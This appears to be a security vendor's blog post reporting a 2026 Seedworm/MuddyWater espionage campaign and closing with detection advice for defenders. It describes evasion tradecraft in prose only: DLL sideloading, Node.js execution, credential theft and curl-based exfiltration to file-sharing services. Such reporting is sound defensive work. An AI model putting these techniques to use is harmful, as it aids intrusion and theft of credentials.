Free Access
Blog
Seedworm Expands Operations with Stealth-Focused Espionage Campaign

Seedworm Expands Operations with Stealth-Focused Espionage Campaign

ThreatMon researchers identified a new espionage campaign linked to Seedworm, the Iran-aligned threat actor also known as MuddyWater and Static Kitten. The activity affected organizations across multiple industries, including manufacturing, finance, government, aviation, and education.

The campaign shows a clear shift toward stealth and operational security.

Instead of using noisy malware techniques, the attackers relied heavily on legitimate tools and trusted processes already present inside enterprise environments. The operation included DLL sideloading with signed binaries, Node.js-based execution, credential theft activity, and data exfiltration through public file-transfer services.

One of the most notable parts of the campaign was the use of signed third-party executables to load malicious DLL files. Because these binaries normally appear legitimate, they are less likely to trigger suspicion during endpoint investigations.

Researchers also observed the attackers using Node.js as part of the execution chain. This helped separate malicious activity from traditional PowerShell logging and reduced forensic visibility on compromised systems.

Credential access played a major role throughout the intrusion. The attackers extracted registry hives, targeted browser-stored credentials, abused Kerberos delegation mechanisms, and used fake Windows credential prompts to capture usernames and passwords.

For exfiltration, the operators avoided building custom infrastructure. Instead, stolen files were uploaded through public file-sharing services using curl.exe, allowing the traffic to blend into normal cloud activity.

The campaign also reflects broader geographic targeting than previously associated with Seedworm operations. Activity observed during Q1 2026 extended beyond the group’s traditional Middle East focus and included organizations in multiple global regions.

The report highlights an important trend for defenders:
modern espionage campaigns increasingly rely on legitimate system activity to avoid detection.

Monitoring suspicious process relationships, unexpected Node.js execution, unusual DLL loading behavior, and unauthorized uploads to public file-sharing services may help security teams identify similar activity earlier in the attack chain.

More posts

This image is about multiple Nginx vulnerabilities.
What are Multiple Nginx Vulnerabilities?
May 24, 2023
This image is about multiple Microsoft IIS vulnerabilities.
What are Multiple Microsoft IIS Vulnerabilities?
May 25, 2023
This image is about SMTP open mail relay vulnerability.
What is SMTP Open Mail Relay Vulnerability?
May 26, 2023
SSL Expire" means an SSL certificate has expired, causing security warnings for site visitors.
What is SSL Expire?
May 27, 2023
What is Server Header Information Disclosure?
What is Server Header Information Disclosure?
May 28, 2023
View All
advanced divider

Share this article

Found it interesting? Don’t hesitate to share it to wow your friends or colleagues

advanced divider

Subscribe to our blog newsletter to follow the latest posts